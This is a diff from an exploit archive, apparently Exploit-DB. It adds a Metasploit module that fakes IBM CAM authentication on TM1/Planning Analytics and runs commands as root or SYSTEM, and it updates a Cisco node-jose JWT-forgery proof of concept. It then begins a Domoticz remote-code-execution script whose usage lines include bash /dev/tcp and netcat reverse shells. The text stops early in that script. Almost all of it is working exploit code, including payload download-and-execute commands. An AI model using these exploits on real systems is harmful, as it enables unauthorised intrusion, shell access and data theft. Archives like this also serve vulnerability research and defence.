+        method to "CAM", a proprietary IBM auth method, which is simulated by the exploit.
+        The exploit then performs a fake authentication as admin, and finally abuses TM1
+        scripting to perform a command injection as root or SYSTEM.
+        Testing was done on IBM PA 2.0.6 and IBM TM1 10.2.2 on Windows and Linux.
+        Versions up to and including PA 2.0.8 are vulnerable. It is likely that versions
+        earlier than TM1 10.2.2 are also vulnerable (10.2.2 was released in 2014).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>',
+                # Vulnerability discovery and Metasploit module
+          'Gareth Batchelor <gbatchelor@cloudtrace.com.au>'
+                # Real world exploit testing and feedback
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-4716' ],
+          [ 'URL', 'https://www.ibm.com/support/pages/node/1127781' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-tm1-rce.txt' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2020/Mar/44' ]
+        ],
+      'Targets'        =>
+        [
+          [ 'Windows',
+            {
+              'Platform'  => 'win',
+              'Arch'      => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [ 'Windows (Command)',
+            {
+              'Platform'  => 'win',
+              'Arch'      => [ARCH_CMD],
+              'Payload'   =>
+              {
+                # Plenty of bad chars in Windows... there might be more lurking
+                'BadChars'  => "\x25\x26\x27\x3c\x3e\x7c",
+              }
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform'  => 'linux',
+              'Arch'      => [ARCH_X86, ARCH_X64]
+            }
+          ],
+          [ 'Linux (Command)',
+            {
+              'Platform'  => 'unix',
+              'Arch'      => [ARCH_CMD],
+              'Payload'   =>
+              {
+                # only one bad char in Linux, baby! (that we know of...)
+                'BadChars'  => "\x27",
+              }
+            }
+          ],
+          [ 'AIX (Command)',
+            {
+              # This should work on AIX, but it was not tested!
+              'Platform'  => 'unix',
+              'Arch'      => [ARCH_CMD],
+              'Payload'   =>
+              {
+                # untested, but assumed to be similar to Linux
+                'BadChars'  => "\x27",
+              }
+            }
+          ],
+        ],
+      'Stance'        => Msf::Exploit::Stance::Aggressive,
+          # we need this to run in the foreground
+      'DefaultOptions'  =>
+        {
+          # give the target lots of time to download the payload
+          'WfsDelay' => 30,
+        },
+      'Privileged'     => true,
+      'DisclosureDate' => "Dec 19 2019",
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        Opt::RPORT(5498),
+        OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
+      ])
+    register_advanced_options [
+      OptString.new('APP_NAME', [false, 'Name of the target application']),
+      OptInt.new('AUTH_ATTEMPTS', [true, "Number of attempts to auth to CAM server", 10]),
+    ]
+  end
+
+  ## Packet structure start
+  # these are client message types
+  MSG_TYPES = {
+    :auth => [ 0x0, 0x1 ],
+    :auth_uniq => [ 0x0, 0x3 ],
+    :auth_1001 => [ 0x0, 0x4 ],
+    :auth_cam_pass => [ 0x0, 0x8 ],
+    :auth_dist => [ 0x0, 0xa ],
+    :obj_register => [ 0, 0x21 ],
+    :obj_prop_set => [ 0, 0x25 ],
+    :proc_create => [ 0x0, 0x9c ],
+    :proc_exec => [ 0x0, 0xc4 ],
+    :get_config => [ 0x1, 0x35 ],
+    :upd_clt_pass => [ 0x1, 0xe2 ],
+    :upd_central => [ 0x1, 0xae ],
+  }
+
+  # packet header is universal for both client and server
+  PKT_HDR = [ 0, 0, 0xff, 0xff ]
+
+  # pkt end marker (client only, server responses do not have it)
+  PKT_END = [ 0xff, 0xff ]
+
+  # empty auth object, used for operations that do not require auth
+  AUTH_OBJ_EMPTY = [ 5, 3, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ]
+
+  # This is actually the client version number
+  # 0x6949200 = 110400000 in decimal, or version 11.4
+  # The lowest that version 11.4 seems to accept is 8.4, so leave that as the default
+  # 8.4 = 0x4CACE80
+  # 9.1 = 0x55ED120
+  # 9.4 = 0x5636500
+  # 10.1 = 0x5F767A0
+  # 10.4 = 0x5FBFB80
+  # 11.1 = 0x68FFE20
+  # 11.4 = 0x6949200
+  #
+  # If something doesn't work, try using one of the values above, but bear in mind this module
+  # was tested on 10.2.2 and 11.4,
+  VERSION = [ 0x03, 0x04, 0xca, 0xce, 0x80 ]
+  ## Packet structure end
+
+  ## Network primitives start
+  # unpack a string (hex string to array of bytes)
+  def str_unpack(str)
+    arr = []
+    str.scan(/../).each do |b|
+      arr += [b].pack('H*').unpack('C*')
+    end
+    arr
+  end
+
+  # write strings directly to socket; each 2 string chars are a byte
+  def sock_rw_str(sock, msg_str)
+    sock_rw(sock, str_unpack(msg_str))
+  end
+
+  # write array to socket and get result
+  # wait should also be implemented in msf
+  def sock_rw(sock, msg, ignore = false, wait = 0)
+    sock.write(msg.pack('C*'))
+    if not ignore
+      sleep(wait)
+      recv_sz = sock.read(2).unpack('H*')[0].to_i(16)
+      bytes = sock.read(recv_sz-2).unpack('H*')[0]
+      bytes
+    end
+  end
+
+  def sock_r(sock)
+    recv_sz = sock.read(2).unpack('H*')[0].to_i(16)
+    bytes = sock.read(recv_sz-2).unpack('H*')[0]
+    bytes
+  end
+
+  def get_socket(app_host, app_port, ssl = 0)
+    begin
+      ctx = { 'Msf' => framework, 'MsfExploit' => self }
+      sock = Rex::Socket.create_tcp(
+        { 'PeerHost' => app_host, 'PeerPort' => app_port, 'Context' => ctx, 'Timeout' => 10 }
+      )
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
+      sock.close if sock
+    end
+    if sock.nil?
+      fail_with(Failure::Unknown, 'Failed to connect to the chosen application')
+    end
+    if ssl == 1
+      # also need to add support for old ciphers
+      ctx = OpenSSL::SSL::SSLContext.new
+      ctx.min_version = OpenSSL::SSL::SSL3_VERSION
+      ctx.security_level = 0
+      ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
+      s = OpenSSL::SSL::SSLSocket.new(sock, ctx)
+      s.sync_close = true
+      s.connect
+      return s
+    end
+    return sock
+  end
+  ## Network primitives end
+
+  ## Packet primitives start
+  def pack_sz(sz)
+    [sz].pack('n*').unpack('C*')
+  end
+
+  # build a packet, ready to send
+  def pkt_build(msg_type, auth_obj, contents)
+    pkt = PKT_HDR + msg_type + auth_obj + contents + PKT_END
+    pack_sz(pkt.length + 2) + pkt
+  end
+
+  # extracts the first object from a server response
+  def obj_extract(res)
+    arr = str_unpack(res)
+
+    # ignore packet header (4 bytes)
+    arr.shift(PKT_HDR.length)
+    if arr[0] == 5
+      # this is an object, get the type (1 byte) plus the object bytes (9 bytes)
+      obj = Array.new
+      obj = arr[0..9]
+      obj
+    end
+  end
+
+  # adds a string to a packet
+  # C string = 0x2; utf string = 0xe; binary = 0xf
+  def stradd(str, type = 0xe)
+    arr = [ type ]                 # string type
+    arr += pack_sz(str.length)
+    arr += str.unpack('C*')
+    arr
+  end
+
+  # packs binary data into an array
+  def datapack(data)
+    arr = []
+    data.chars.each do |d|
+      arr << d.ord
+    end
+    arr
+  end
+
+  def binadd(data)
+    arr = [ 0xf ]                     # binary type 0xf
+    arr += pack_sz(data.length)       # 2 byte size
+    arr += datapack(data)             # ... and add the data
+  end
+
+  def get_str(data)
+    s = ""
+    while data[0] != '"'.ord
+      data.shift
+    end
+    data.shift
+    while data[0] != '"'.ord
+      s += data[0].chr
+      data.shift
+    end
+    # comma
+    data.shift
+    s
+  end
+
+  # This fetches the current IntegratedSecurityMode from a packet such as
+  # 0000ffff070000000203000000 01 07000000020e00000e0000                  (1)
+  # 0000ffff070000000203000000 02 07000000020e00000e00084b65726265726f73  (2)
+  # 0000ffff070000000203000000 06 07000000010e0000                        (6)
+  def get_auth(data)
+    # make it into an array
+    data = str_unpack(data)
+    if data.length > 13
+      # skip 13 bytes (header + array indicator + index indicator)
+      data.shift(13)
+      # fetch the auth method byte
+      data[0]
+    end
+  end
+
+  def update_auth(auth_method, restore = false)
+    # first byte of data is ignored, so add an extra space
+    if restore
+      srv_config = " IntegratedSecurityMode=#{auth_method}"
+    else
+      # To enable CAM server authentication over SSL, the CAM server certificate has to be previously
+      # imported into the server. Since we can't do this, disable SSL in the fake CAM.
+      srv_config = " IntegratedSecurityMode=#{auth_method}\n" +
+        "ServerCAMURI=http://#{srvhost}:#{srvport}\n" +
+        "ServerCAMURIRetryAttempts=10\nServerCAMIPVersion=ipv4\n" +
+        "CAMUseSSL=F\n"
+    end
+
+    arr =
+      [ 3 ] + [ 0, 0, 0, 2 ] +                             # no idea what this index is
+      [ 3 ] + [ 0, 0, 0, 2 ] +                             # same here
+      [ 3 ] + [ 0 ] * 4 +                                  # same here
+      stradd(rand_text_alpha(5..12)) +                     # same here...
+      stradd("tm1s_delta.cfg") +                           # update file name
+      binadd(srv_config) +                                 # file data
+      stradd(rand_text_alpha(0xf))                         # last sync timestamp, max len 0xf
+
+    upd_auth = pkt_build(
+      MSG_TYPES[:upd_central],
+      AUTH_OBJ_EMPTY,
+      [ 7 ] +                                   # array type
+      [ 0, 0, 0, 7 ] +                          # array len (fixed size of 7 for this pkt)
+      arr
+    )
+
+    upd_auth
+  end
+  ## Packet primitives end
+
+  ## CAM HTTP functions start
+  def on_request_uri(cli, request)
+    xml_res = %{<?xml version="1.0" encoding="UTF-8"?>
+    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns1="http://developer.cognos.com/schemas/dataSourceCommandBlock/1/" xmlns:bus="http://developer.cognos.com/schemas/bibus/3/" xmlns:cm="http://developer.cognos.com/schemas/contentManagerService/1" xmlns:ns10="http://developer.cognos.com/schemas/indexUpdateService/1" xmlns:ns11="http://developer.cognos.com/schemas/jobService/1" xmlns:ns12="http://developer.cognos.com/schemas/metadataService/1" xmlns:ns13="http://developer.cognos.com/schemas/mobileService/1" xmlns:ns14="http://developer.cognos.com/schemas/monitorService/1" xmlns:ns15="http://developer.cognos.com/schemas/planningAdministrationConsoleService/1" xmlns:ns16="http://developer.cognos.com/schemas/planningRuntimeService/1" xmlns:ns17="http://developer.cognos.com/schemas/planningTaskService/1" xmlns:ns18="http://developer.cognos.com/schemas/reportService/1" xmlns:ns19="http://developer.cognos.com/schemas/systemService/1" xmlns:ns2="http://developer.cognos.com/schemas/agentService/1" xmlns:ns3="http://developer.cognos.com/schemas/batchReportService/1" xmlns:ns4="http://developer.cognos.com/schemas/dataIntegrationService/1" xmlns:ns5="http://developer.cognos.com/schemas/dataMovementService/1" xmlns:ns6="http://developer.cognos.com/schemas/deliveryService/1" xmlns:ns7="http://developer.cognos.com/schemas/dispatcher/1" xmlns:ns8="http://developer.cognos.com/schemas/eventManagementService/1" xmlns:ns9="http://developer.cognos.com/schemas/indexSearchService/1">
+    <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+      <cm:queryResponse>
+        <result baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]">
+        PLACEHOLDER
+        </result>
+      </cm:queryResponse>
+    </SOAP-ENV:Body>
+    </SOAP-ENV:Envelope>}
+
+    session =
+    %Q{   <item xsi:type="bus:session">
+            <identity>
+              <value baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]">
+                <item xsi:type="bus:account">
+                  <searchPath><value>admin</value></searchPath>
+                </item>
+              </value>
+            </identity>
+          </item>}
+
+    account =
+    %Q{   <item xsi:type="bus:account">
+            <defaultName><value>admin</value></defaultName>
+          </item>}
+
+    headers = { "SOAPAction" => '"http://developer.cognos.com/schemas/contentManagerService/1"'}
+    if request.body.include? "<searchPath>/</searchPath>"
+      print_good("CAM: Received first CAM query, responding with account info")
+      response = xml_res.sub('PLACEHOLDER', account)
+    elsif request.body.include? "<searchPath>~~</searchPath>"
+      print_good("CAM: Received second CAM query, responding with session info")
+      response = xml_res.sub('PLACEHOLDER', session)
+    elsif request.body.include? "<searchPath>admin</searchPath>"
+      print_good("CAM: Received third CAM query, responding with random garbage")
+      response = rand_text_alpha(5..12)
+    elsif request.method == "GET"
+      print_good("CAM: Received request for payload executable, shell incoming!")
+      response = @pl
+      headers = { "Content-Type" => "application/octet-stream" }
+    else
+      response = ''
+      print_error("CAM: received unknown request")
+    end
+    send_response(cli, response, headers)
+  end
+  ## CAM HTTP functions end
+
+  def restore_auth(app, auth_current)
+    print_status("Restoring original authentication method #{auth_current}")
+    upd_cent = update_auth(auth_current, true)
+    s = get_socket(app[2], app[3], app[5])
+    sock_rw(s, upd_cent, true)
+    s.close
+  end
+
+  def exploit
+    # first let's check if SRVHOST is valid
+    if datastore['SRVHOST'] == "0.0.0.0"
+      fail_with(Failure::Unknown, "Please enter a valid IP address for SRVHOST")
+    end
+
+    # The first step is to query the administrative server to see what apps are available.
+    # This action can be done unauthenticated. We then list all the available app servers
+    # and pick a random one that is currently accepting clients. This step is important
+    # not only to know what app servers are available, but also to know if we need to use
+    # SSL or not.
+    # The admin server is usually at 5498 using SSL. Non-SSL access is disabled by default, but when enabled, it's available at port 5495
+    #
+    # Step 1: fetch the available applications / servers from the Admin server
+    # ... if the user did not enter an APP_NAME
+    if datastore['APP_NAME'].nil?
+      connect
+      print_status("Connecting to admin server and obtaining application data")
+
+      # for this packet we use string type 0xc (?) and cut off the PKT_END
+      pkt_control = PKT_HDR + [0] + stradd(lhost, 0xc)
+      pkt_control = pack_sz(pkt_control.length + 2) + pkt_control
+      data = sock_rw(sock, pkt_control)
+      disconnect
+
+      if data
+        # now process the response
+        apps = []
+
+        data = str_unpack(data)
+
+        # ignore packet header (4 bytes)
+        data.shift(PKT_HDR.length)
+
+        # now just go through the list we received, sample format below
+        # "24retail","tcp","10.11.12.123","17414","1460","1","127.0.0.1,127.0.0.1,127.0.0.1","1","0","","","","0","","0","","ipv4","22","0","2","http://centos7.doms.com:8014","8014"
+        # "GO_New_Stores","tcp","10.11.12.123","45557","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","23","0","2","https://centos7.doms.com:5010","5010"
+        # "GO_Scorecards","tcp","10.11.12.123","44321","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:44312","44312"
+        # "Planning Sample","tcp","10.11.12.123","12345","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:12354","12354"
+        # "proven_techniques","tcp","10.11.12.123","53333","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:5011","5011"
+        # "SData","tcp","10.11.12.123","12346","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:8010","8010"
+        while data != nil and data.length > 2
+          # skip the marker (0x0, 0x5) that indicates the start of a new app
+          data = data[2..-1]
+
+          # read the size and fetch the data
+          size = (data[0..1].pack('C*').unpack('H*')[0].to_i(16))
+          data_next = data[2+size..-1]
+          data = data[2..size]
+
+          # first is application name
+          app_name = get_str(data)
+
+          # second is protocol, we don't care
+          proto = get_str(data)
+
+          # third is IP address
+          ip = get_str(data)
+
+          # app port
+          port = get_str(data)
+
+          # mtt maybe? don't care
+          mtt = get_str(data)
+
+          # not sure, and don't care
+          unknown = get_str(data)
+
+          # localhost addresses? again don't care
+          unknown_addr = get_str(data)
+
+          # I think this is the accepting clients flag
+          accepts = get_str(data)
+
+          # and this is a key one, the SSL flag
+          ssl = get_str(data)
+
+          # the leftover data is related to the REST API *I think*, so we just ignore it
+
+          print_good("Found app #{app_name} #{proto} ip: #{ip} port: #{port} available: #{accepts} SSL: #{ssl}")
+          apps.append([app_name, proto, ip, port.to_i, accepts.to_i, ssl.to_i])
+
+          data = data_next
+        end
+      else
+        fail_with(Failure::Unknown, 'Failed to obtain application data from the admin server')
+      end
+
+      # now pick a random application server that is accepting clients via TCP
+      app = apps.sample
+      total = apps.length
+      count = 0
+
+      # TODO: check for null return here, and probably also response size > 0x20
+      while app[1] != "tcp" and app[4] != 1 and count < total
+        app = apps.sample
+        count += 1
+      end
+
+      if count == total
+        fail_with(Failure::Unknown, 'Failed to find an application we can attack')
+      end
+      print_status("Picked #{app[0]} as our target, connecting...")
+
+    else
+      # else if the user entered an APP_NAME, build the app struct with that info
+      ssl = datastore['SSL']
+      app = [datastore['APP_NAME'], 'tcp', rhost, rport, 1, (ssl ? 1 : 0)]
+      print_status("Attacking #{app[0]} on #{peer} as requested with TLS #{ssl ? "on" : "off"}")
+    end
+
+    s = get_socket(app[2], app[3], app[5])
+
+    # Step 2: get the current app server configuration variables, such as the current auth method used
+    get_conf = stradd(app[0])
+    get_conf += VERSION
+    auth_get = pkt_build(MSG_TYPES[:get_config], AUTH_OBJ_EMPTY, get_conf)
+    data = sock_rw(s, auth_get)
+    auth_current = get_auth(data)
+
+    print_good("Current auth method is #{auth_current}, we're good to go!")
+    s.close
+
+    # Step 3: start the fake CAM server / exploit server
+    if payload.arch.include? ARCH_CMD
+      @pl = ''
+    else
+      @pl = generate_payload_exe
+    end
+
+    # do not use SSL for the CAM server!
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+
+    print_status("Starting up the fake CAM server...")
+    start_service(
+      {
+        'Uri' => {
+          'Proc' => Proc.new { |cli, req|
+            on_request_uri(cli, req)
+          },
+          'Path' => '/'
+        },
+      }
+    )
+    datastore['SSL'] = true if ssl_restore
+
+    # Step 4: send the server config update packet, and ignore what it sends back
+    print_status("Changing authentication method to 4 (CAM auth)")
+    upd_cent = update_auth(4)
+    s = get_socket(app[2], app[3], app[5])
+    sock_rw(s, upd_cent, true)
+    s.close
+
+    # Step 5: send the CAM auth request and obtain the authentication object
+    # app name
+    auth_pkt = stradd(app[0])
+
+    auth_pkt += [ 0x7, 0, 0, 0, 3 ]                           # array with 3 objects
+
+    # passport, can be random
+    auth_pkt += stradd(rand_text_alpha(5..12))
+
+    # no idea what these vars are, but they don't seem to matter
+    auth_pkt += stradd(rand_text_alpha(5..12))
+    auth_pkt += stradd(rand_text_alpha(5..12))
+
+    # client IP
+    auth_pkt += stradd(lhost)
+
+    # add the client version number
+    auth_pkt += VERSION
+
+    auth_dist = pkt_build(MSG_TYPES[:auth_cam_pass], AUTH_OBJ_EMPTY, auth_pkt)
+
+    print_status("Authenticating using CAM Passport and our fake CAM Service...")
+    s = get_socket(app[2], app[3], app[5])
+
+    # try to authenticate up to AUTH_ATTEMPT times, but usually it works the first try
+    # adjust the 4th parameter to sock_rw to increase the timeout if it's not working and / or the CAM server is on another network
+    counter = 1
+    res_auth = ''
+    while(counter < datastore['AUTH_ATTEMPTS'])
+      # send the authenticate request, but wait a bit so that our fake CAM server can respond
+      res_auth = sock_rw(s, auth_dist, false, 0.5)
+      if res_auth.length < 20
+        print_error("Failed to authenticate on attempt number #{counter}, trying again...")
+        counter += 1
+        next
+      else
+        break
+      end
+    end
+    if counter == datastore['AUTH_ATTEMPTS']
+      # if we can't auth, bail out, but first restore the old auth method
+      s.close
+      #restore_auth(app, auth_current)
+      fail_with(Failure::Unknown, "Failed to authenticate to the Application server. Run the exploit and try again!")
+    end
+
+    auth_obj = obj_extract(res_auth)
+
+    # Step 6: create a Process object
+    print_status("Creating our Process object...")
+    proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:proc_create], auth_obj, [])))
+
+    if payload.arch == ["cmd"]
+      cmd_one = payload.encoded
+      cmd_two = ''
+    else
+      payload_url = "http://#{srvhost}:#{srvport}/"
+      exe_name = rand_text_alpha(5..13)
+      if target['Platform'] == 'win'
+        # the Windows command has to be split amongst two lines; the & char cannot be used to execute two processes in one line
+        exe_name += ".exe"
+        exe_name = "C:\\Windows\\Temp\\" + exe_name
+        cmd_one = "certutil.exe -urlcache -split -f #{payload_url} #{exe_name}"
+        cmd_two = exe_name
+      else
+        # the Linux one can actually be done in one line, but let's make them similar
+        exe_name = "/tmp/" + exe_name
+        cmd_one = "curl #{payload_url} -o #{exe_name};"
+        cmd_two = "chmod +x #{exe_name}; exec #{exe_name}"
+      end
+
+      register_file_for_cleanup(exe_name)
+    end
+
+    proc_cmd =
+      [ 0x3, 0, 0, 2, 0x3c ] +                        # no idea what this index is
+      [ 0x7, 0, 0, 0, 2 ] +                           # array with 2 objects (2 line script)
+    # the first argument is the command
+    # the second whether it should wait (1) or not (0) for command completion before returning
+      stradd("executecommand('#{cmd_one}', #{cmd_two.empty? ? "0" : "1"});") +
+      stradd("executecommand('#{cmd_two}', 0);")
+
+    # Step 7: add the commands into the process object
+    print_status("Adding command: \"#{cmd_one}\" to the Process object...")
+    if cmd_two != ''
+      print_status("Adding command: \"#{cmd_two}\" to the Process object...")
+    end
+    sock_rw(s, pkt_build(MSG_TYPES[:obj_prop_set], [], proc_obj + proc_cmd))
+
+    # Step 8: register the Process object with a random name
+    obj_name = rand_text_alpha(5..12)
+    print_status("Registering the Process object under the name '#{obj_name}'")
+    proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:obj_register], auth_obj, proc_obj + stradd(obj_name))))
+
+    # Step 9: execute the Process!
+    print_status("Now let's execute the Process object!")
+    sock_rw(s, pkt_build(MSG_TYPES[:proc_exec], [], proc_obj + [ 0x7 ] + [ 0 ] * 4), true)
+    s.close
+
+    # Step 10: restore the auth method and enjoy the shell!
+    restore_auth(app, auth_current)
+
+    if payload.arch.include? ARCH_CMD
+      print_good("Your command should have executed by now, enjoy!")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/44324.py b/exploits/multiple/webapps/44324.py
index b6046bef2..75fc6192b 100755
--- a/exploits/multiple/webapps/44324.py
+++ b/exploits/multiple/webapps/44324.py
@@ -1,14 +1,20 @@
+#!/usr/bin/env python3
+
 import base64
-import urllib
+from urllib.parse import quote_plus
 import rsa
 import sys
 
 #zi0Black
 
 '''
+EDB Note: This has been updated ~ https://github.com/offensive-security/exploitdb/pull/139
+
 POC of CVE-2018-0114 Cisco node-jose <0.11.0
+Example: python3 44324.py "mypayload" 512
 
 Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram)
+Enhanced for python3 by github.com/eshaan7
 
 Mail: a.cappa@zioblack.xyz
 Site: https://zioblack.xyz
@@ -20,63 +26,64 @@ Site: https://pentesterlab.com
 
 '''
 
-def generate_key (key_size):
+def generate_key(key_size):
     #create rsa priv & public key
     print ("[+]Creating-RSA-pair-key")
-    (public_key,private_key)=rsa.newkeys(key_size,poolsize=8)
+    (public_key,private_key) = rsa.newkeys(key_size,poolsize=8)
     print ("\t[+]Pair-key-created")
     return private_key, public_key
 
-def to_bytes(n, length, endianess='big'):
-    h = '%x' % n
-    s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex')
-    return s if endianess == 'big' else s[::-1]
+def pack_bigint(i):
+    b = bytearray()
+    while i:
+        b.append(i & 0xFF)
+        i >>= 8
+    return b[::-1]
 
 def generate_header_payload(payload,pubkey):
     #create header and payload
     print ("[+]Assembling-the-header-and-the-payload")
-    xn = pubkey.n
-    xe = pubkey.e
-    n=base64.urlsafe_b64encode(to_bytes(xn,sys.getsizeof(xn),'big'))
-    e=base64.urlsafe_b64encode(to_bytes(xe,sys.getsizeof(xe),'big'))
-    headerAndPayload = base64.b64encode('{"alg":"RS256",'
+    n=base64.urlsafe_b64encode(pack_bigint(pubkey.n)).decode('utf-8').rstrip('=')
+    e=base64.urlsafe_b64encode(pack_bigint(pubkey.e)).decode('utf-8').rstrip('=')
+    headerAndPayload = base64.b64encode(('{"alg":"RS256",'
                                         '"jwk":{"kty":"RSA",'
                                         '"kid":"topo.gigio@hackerzzzz.own",'
                                         '"use":"sig",'
                                         '"n":"'+n+'",'
-                                        '"e":"'+e+'"}}')
-    headerAndPayload=headerAndPayload+"."+base64.b64encode(payload)
-    headerAndPayload = headerAndPayload.encode('utf-8').replace("=","")
+                                        '"e":"'+e+'"}}').encode())
+    headerAndPayload = headerAndPayload+b"."+base64.b64encode(payload)
+    headerAndPayload = headerAndPayload
     print ("\t[+]Assembed")
     return headerAndPayload
 
-def generate_signature (firstpart,privkey):
+def generate_signature(firstpart,privkey):
     #create signature
     signature = rsa.sign(firstpart,privkey,'SHA-256')
-    signatureEnc = base64.b64encode(signature).encode('utf-8').replace("=", "")
+    signatureEnc = base64.b64encode(signature)
     print ("[+]Signature-created")
     return signatureEnc
 
 def create_token(headerAndPayload,sign):
     print ("[+]Forging-of-the-token\n\n")
-    token = headerAndPayload+"."+sign
-    token = urllib.quote_plus(token)
+    token = (headerAndPayload+b"."+sign).decode('utf-8').rstrip('=')
+    token = quote_plus(token)
     return token
 
-
 if(len(sys.argv)>0):
-    payload = str(sys.argv[1])
-    key_size = sys.argv[2]
+    payload = bytes(str(sys.argv[1]).encode('ascii'))
+    key_size = int(sys.argv[2])
 else:
-    payload = 'somthings'
+    payload = b'admin'
+    key_size = int(512)
+
 
 banner="""
-   _____  __      __  ______            ___     ___    __    ___              ___    __   __   _  _   
-  / ____| \ \    / / |  ____|          |__ \   / _ \  /_ |  / _ \            / _ \  /_ | /_ | | || |                    
- | |       \ \  / /  | |__     ______     ) | | | | |  | | | (_) |  ______  | | | |  | |  | | | || |_ 
+   _____  __      __  ______            ___     ___    __    ___              ___    __   __   _  _
+  / ____| \ \    / / |  ____|          |__ \   / _ \  /_ |  / _ \            / _ \  /_ | /_ | | || |
+ | |       \ \  / /  | |__     ______     ) | | | | |  | | | (_) |  ______  | | | |  | |  | | | || |_
  | |        \ \/ /   |  __|   |______|   / /  | | | |  | |  > _ <  |______| | | | |  | |  | | |__   _|
- | |____     \  /    | |____            / /_  | |_| |  | | | (_) |          | |_| |  | |  | |    | |  
-  \_____|     \/     |______|          |____|  \___/   |_|  \___/            \___/   |_|  |_|    |_|    by @zi0Black    
+ | |____     \  /    | |____            / /_  | |_| |  | | | (_) |          | |_| |  | |  | |    | |
+  \_____|     \/     |______|          |____|  \___/   |_|  \___/            \___/   |_|  |_|    |_|    by @zi0Black
 """
 
 if __name__ == '__main__':
diff --git a/exploits/multiple/webapps/46773.py b/exploits/multiple/webapps/46773.py
new file mode 100755
index 000000000..6b7dac73c
--- /dev/null
+++ b/exploits/multiple/webapps/46773.py
@@ -0,0 +1,219 @@
+#!/usr/bin/env python
+#-*- coding: utf-8 -*-
+# Exploit Title: Unauthenticated Remote Command Execution on Domoticz <= 4.10577
+# Date: April 2019
+# Exploit Author: Fabio Carretto @ Certimeter Group
+# Vendor Homepage: https://www.domoticz.com/
+# Software Link: https://www.domoticz.com/downloads/
+# Version: Domoticz <= 4.10577
+# Tested on: Debian 9
+# CVE: CVE-2019-10664, CVE-2019-10678
+# ====================================================================
+# Bypass authentication, inject commands and execute them
+# Required login page or no authentication (doesn't work with "Basic-Auth" setting)
+# There are 3 injection modes. The 1st and the 2nd bypass the char filter:
+# 1.Default mode insert the commands in a script and reply with it once to
+#   an HTTP request. Set address and port of the attacker host with -H and -P
+# 2.(-zipcmd) a zip icon pack will be uploaded. The domoticz installation path
+#   can be optionally specified with -path /opt/domoti..
+# 3.(-direct) commands executed directly. Characters like & pipe or redirection
+#   cannot be used. The execution may block domoticz web server until the end
+# Examples:
+# ./exploit.py -H 172.17.0.1 -P 2222 http://172.17.0.2:8080/ 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1 &'
+# ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &'
+
+import argparse
+import requests
+import urllib
+import base64
+import json
+import BaseHTTPServer
+import zipfile
+import thread
+
+# Retrieve data from db with the SQL Injection on the public route
+def steal_dbdata(field):
+    sqlinj = sqlpref % field
+    urltmp = url_sqlinj + sqlinj
+    r = session.get(urltmp)
+    print '[+] %s: %s' % (field,r.text)
+    return r.text
+
+# Login and return the SID cookie
+def dologin(username, password):
+    url_login_cred = url_login % (username, password)
+    r = session.get(url_login_cred)
+    sid = r.headers['Set-Cookie']
+    sid = sid[sid.find('SID=')+4 : sid.find(';')]
+    print '[+] SID=' + sid
+    return sid
+
+# Search an uvc cam. If exists return its json config
+def get_uvc_cam():
+    r = session.get(url_camjson)
+    cams = json.loads(r.text)
+    if cams['status'] == 'OK' and 'result' in cams:
+        for cam in cams['result']:
+            if cam['ImageURL']=='uvccapture.cgi':
+                return cam
+    return None
+
+# Prompt the user and ask if continue or not
+def prompt_msg(msg):
+    print '[+] WARNING: ' + msg
+    if not args.f and not raw_input('[+] Continue? [y/N]: ') in ["y","Y"]:
+        exit(0)
+    return None
+
+# Embed the commands in a zip icon file (-zipcmd)
+def create_zip(commandsline):
+    zipname = 'iconpackfake.zip'
+    with zipfile.ZipFile(zipname, 'w') as zip:
+        zip.writestr('icons.txt', "fakeicon;Button fakeicon;fake")
+        zip.writestr('fakeicon.png', commandsline)
+        zip.writestr('fakeicon48_On.png', commandsline)
+        zip.writestr('fakeicon48_Off.png', commandsline)
+    return zipname
+
+# HTTP server that reply once with the content of the script
+class SingleHandler(BaseHTTPServer.BaseHTTPRequestHandler):
+    respbody = ""
+    def do_GET(self):
+        self.send_response(200)
+        self.send_header('Content-type', 'text/html')
+        self.end_headers()
+        self.wfile.write(self.respbody)
+        return None
+    def log_request(self, code):
+        pass
+
+#--------------------------------------------------------------------
+# INITIALIZATION
+#--------------------------------------------------------------------
+parser = argparse.ArgumentParser(
